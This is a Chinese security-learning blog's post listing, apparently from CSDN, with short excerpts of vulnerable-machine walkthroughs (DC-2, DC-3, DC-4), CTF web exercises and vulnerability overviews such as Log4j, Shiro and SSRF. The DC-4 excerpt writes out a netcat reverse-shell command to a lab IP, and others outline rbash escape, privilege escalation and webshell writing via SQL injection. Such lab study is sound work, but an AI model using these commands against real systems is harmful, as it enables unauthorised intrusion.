- 博客(27)
- 收藏
- 关注
原创 靶机DC-4
nc -e /bin/bash 192.168.56.128 8086(nc+-e+/bin/bash+192.168.56.128+8086)空格用+号代替,也可以直接进行url编码。小结:用到的用户也就是jim和charles,要是前者能提权就省事了,不过靶机都是有提示,都是最后要提权,估计后面的靶机提权也不重样。去邮箱看到:/var/spool/mail 这里是前面提到的三个用户的:charles,以及给了密码:^xHhA&hvim0y。查看mbox的内容,看到有邮箱提示:来自root用户的信。
2024-07-17 00:21:24 392
原创 靶机DC-2
唯一有用的就只有vi(编辑器)这个命令,这里可以里用vi或者是BASH_CMDS设置shell来绕过rbash,然后再设置环境变量添加命令。已经升级为bash了,无法执行cat命令是因为环境变量的问题,用以下命令添加一下两条路径即可。后台登录地址,弱密码没爆破出来,结合上面的用 cewl生成字典。提示我们得su一下jerry,su是Linux切换用户的命令。得到flag4,提示git,还有root看来是要提权的操作。发现git能使用root的权限,这里有两种提权的姿势。爆破出了jerry和tom的密码。
2024-07-13 17:06:11 843
原创 红日(一)
拓扑图win7需要配置两张网卡,模拟内外网环境,充当跳板机外网网段:56内网网段:72目标拿下域控,2008,72.131,已经72.132。
2024-07-12 15:52:12 951 1
原创 靶机DC-3
搭建可能出现的情况:第一次导入镜像失败,可以再次尝试若出现报错的情况,都能搜到攻略,在设置里边更改即可以上情况博主都遇到了,不过都能搜到攻略。
2024-07-09 21:13:53 383
原创 框架漏洞(后续补充)
CVE-2020-1957漏洞利用了Apache Shiro和Spring Boot对URL处理的差异性,攻击者可以构造特定的URL,绕过Shiro对Spring Boot中Servlet的权限控制,实现未授权的越权访问。Apache Log4j2的某些版本中,攻击者可通过JNDI注入执行远程代码。这通常涉及到恶意的日志消息,允许攻击者访问服务器上的资源。,将其忽略或错误处理为/admin/,Shiro的路径检查就会失效,允许未经授权的访问。-c是执行的bash命令,-A是指JNDI服务器IP。
2024-06-21 17:07:18 372
原创 XSS,CSRF,SSRF简述
http是一种无状态的协议,所以客户端每次发出请求时,下一次请求无法得知上一次请求所包含的状态数据,也就是说影响我们浏览资源的交互性体验变差。比如我们登录后台管理页面,当我们已经在登录状态下,每次在更换功能点就不用在每次都要进行登录。从而大大提升我们使用体验1、cookie数据存放在客户的浏览器上,session数据放在服务器上。2、cookie不是很安全,别人可以分析存放在本地的COOKIE并进行COOKIE欺骗 考虑到安全应当使用session。3、session会在一定时间内保存在服务器上。
2024-04-27 14:56:31 846
原创 SSRF简述
SSRF(Server-Side Request Forgery,服务端请求伪造)是一种安全漏洞,攻击者可以利用它来发送恶意请求,通常是从受信任的服务器端发起。攻击者利用这个漏洞可以访问服务器内部的资源、绕过防火墙、执行内部网络扫描、利用内部系统等假设有一个网站允许用户通过输入一个URL来获取远程服务器上的图片并显示在网页上。网站的后端处理用户的输入,然后从指定的URL下载图片并显示在网页上。
2024-04-27 14:33:36 477
原创 sql注入getshell
条件:web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可这里进行16进制转换,因此是0X开头,写入“
2024-04-17 22:57:03 617 1
原创 JavaScript简述
JavaScript 是一种轻量级的编程语言(PHP都是弱语言),改善用户界面和用户体验。运行在客户端(浏览器)。服务端编程node.js:Node.js 主要用于服务器端,用于构建服务器应用、API、后端服务等。,当然HTML和CSS属于标记语言,三者(框架+外观装饰+功能交互)构成我们熟知的前端界面,JS使得我们的交互有大大的帮助。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。由两大部分组成ECMAScript:规定js基础语法核心知识。
2023-09-17 20:13:19 170 1
原创 Ubuntu安装vmtools,dokcer及换源
此时桌面有vmtoolsCD盘,双击打开盘,然后将文件复制到或者提取到你要存放文件的目录下。2、解压文件进入目录执行安装,这里输入yes使用默认安装路径只要出现路径的就按下回车,出现【Yes/No】全部选择Yes。出现安装成功,重启即可。
2023-06-05 18:25:12 250
原创 web-php特性
Web89正则匹配,类型转换源码intval()函数用于获取变量的整数值这里主要是这个函数num))用正则表达式匹配输入值num,如果存在数字,则返回错误信息"no no no!并终止程序。这个函数是类型转换,也就是转为整形类型转换请移步因此num满足以上即可输出flag.phpnum[]=1。
2023-05-10 13:30:46 231
原创 PHP-数据类型
可空类型允许变量的值可以是特定类型或 null,而标量类型声明则要求函数或方法的参数或返回值必须是特定类型的标量值(例如整数、浮点数、布尔值或字符串),可以使用 int、float、bool、string 等关键字来声明。11.标量类型声明(Scalar Type Declarations):标量类型声明是 PHP 7 中引入的新特性,要求函数或方法的参数或返回值必须是特定类型的标量值,可以使用 int、float、bool、string 等关键字来声明。在 PHP 中,布尔型通常用于条件判断和逻辑运算。
2023-05-01 00:00:15 175
原创 web-命令执行
web29system执行;通配符题目:命令执行,需要严格的过滤这里对flag进行过滤,用通配符?flag绕过可以用 f*以下参考然后访问1.txt 就ok了web30把system过滤了?是一个PHP命令执行代码,它会在服务器上执行ls命令具体来说,exec()是PHP中用于执行系统命令的函数,它可以在参数中指定要执行的命令,而echo则将exec()函数返回的命令输出到页面上。因此,该代码相当于执行了ls,也就是达到了29。
2023-04-30 17:36:12 291
原创 web-信息收集
在计算机网络中,探针通常用于确保网络设备能够正常工作,并且记录网络的性能和瓶颈。例如,管理员可以使用 ICMP 探针测试网络设备的连通性,HTTP 探针测试 Web 服务器的可用性,或 SNMP 探针监测路由器或交换机的状态等。在计算机网络中,探针通常用于确保网络设备能够正常工作,并且记录网络的性能和瓶颈。例如,管理员可以使用 ICMP 探针测试网络设备的连通性,HTTP 探针测试 Web 服务器的可用性,或 SNMP 探针监测路由器或交换机的状态等。那就用抓包试试,用户有了,密码试试字符串,so?
2023-04-30 13:21:07 192
原创 web-md5绕过
具体来说,代码首先将�1和v1和v2分别存储为变量,然后通过isset()函数检查它们是否都存在。经过MySQL编码后会变成'or'6xxx,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密。中使用了md5()函数加密, 我们可以利用MD5加密漏洞来绕过。没有对用户输入的密码长度进行验证,仅仅判断了长度是否大于。通过is_numeric()函数检查$v2是否为数字。通过md5()函数将�1和v1和v2哈希值相互比较。如果所有这些验证都通过,则输出$flag变量的值。的万能密码,来绕过登录呢。
2023-04-27 17:27:17 362
原创 PHP-伪协议
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
2023-04-25 17:12:47 4740
原创 JDK多环境配置
配置环境变量,添加系统变量,添加个数看需求,我添加JAVA_HOME18注意JAVA_HOME做为主变量要与这两个区分开,切换成jdk18时,只需更改JAVA_HOME,将变量%JAVA_HOME11%换成%JAVA_HOME18%x64 Compressed Archive:二进制包,已编译好的可直接使用的程序,解压缩后,点击。同一台电脑如何实现jdk双环境,或者多环境?以满足不同环境下使用呢,我现在安装的是jdk11,现在需要安装jdk18,有不同。:安装程序,执行安装。安装、不要有中文路径。
2023-04-25 16:24:40 1044
原创 WEB-PUT练习
可以看出,第三个路由是一个秘密路由,只有当请求方法为 PUT 并且路径为 "/super-secret-route-nobody-will-guess" 时才能访问。这可能是一个漏洞,因为未对该路由进行身份验证或授权检查,攻击者可以通过篡改 HTTP 请求来绕过安全控制,获取敏感信息或执行恶意操作。路由:使用 PUT 方法打开名为 "flag" 的文件并将其中的内容返回给客户端。用bp抓包,改一下请求方式,然后改文件路径在发包,就返回falg了。方法可以用于上传或更新文件,也可以用于创建新的资源。
2023-04-25 15:52:21 251
原创 WEB-NSS练习
这是个陷阱,flag不对,再找找,发现在html的目录下面还存在.git的文件,将文件翻一翻找一找,发现了一个phpinfo的文件,怀疑flag存放在phpinfo中,利用刚才上传的shell,输出一下phpinfo页面就好了。没错开头就是文件上传,web的题还有正儿八经的文件上传,习惯用bp抓一手。且等会上传的时候,传一个名字为flag.jpg的一句mm就行了。这道题就是那个文件上传靶场上面的第四关,我说怎么那么熟悉。先创建一个.htaccess的文件。文件上传,抓包,该后缀,上传即可。
2023-04-25 15:42:22 76
原创 CTF-新手misc
流量分析使用题目得到密码,由于是网站登录,打开之后过滤http 清除看到login,点开得到flag{ffb7567a1d4f4abdffdb54e022f8facd}荷兰宽带数据泄露下载之后是bin后缀的二进制文件,使用RouterPassview搜索关键字username和password,最终flag是username后门查杀下载之后是个HTML文件,按照描述有后门且答案是MD5,使用D盾扫出来,在搜索pass密码即可文件中的秘密。
2023-04-24 23:14:50 1018 1
原创 file-upload
通过前面的爆破就发现,后端校验比前端校验更安全,更可靠,一切在前端做的安全措施都是不靠谱的,仅起到辅助作用,但是前端校验可以增加用户体验,前端校验防君子,后端校验防小人首先只能上传图片,查看源码,上传位置有HTML onchange该元素 “在元素值改变时触发”将“checkFileExt(this.value)“属性删除,再次上传php就成功了。
2023-04-24 22:40:07 112 1
原创 pikachu暴力破解
反复尝试了一线,发现无论输入错误验证码,或者为空,都返回用户域名username or password is not exists~(用户名或密码不存在)此时验证码就不起作用了,验证码完全交给前端,后端并没有验证工作,因此还是只爆破用户名和密码就行了。Burp绕过token,这里选择pitchfork 一对一模式,设置密码和token两个,添加到payload。的图片,因此只改变用户名和密码,虽然报错,但验证码可反复重复使用,还是老样子发送到攻击模块。剩下的和之前一样,省略一些步骤了,直接看结果。
2023-04-24 22:30:30 113 2
原创 应急响应1
进去之后一眼就看出来了一个,因此和上面对应住了,在/static/img/1.php路径下面有一个shell。刚开始进入了一个二手交易市场,等待一会儿,自动跳转一个url复制它就是flag记住去除后面的斜杠。文件,当然这个命令只是快速做题的一种方法,我也是参考了大佬的文章,正常我是一点一点翻出来的。然后进入日志路径查看/var/log/nginx/access.log.db。在路径下找的,就如图路径下找到了,database.php。的账户,删除掉就行了,当然也可以不用命令,直接。进去手动删了也是可以的。
2023-04-24 22:11:29 185 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人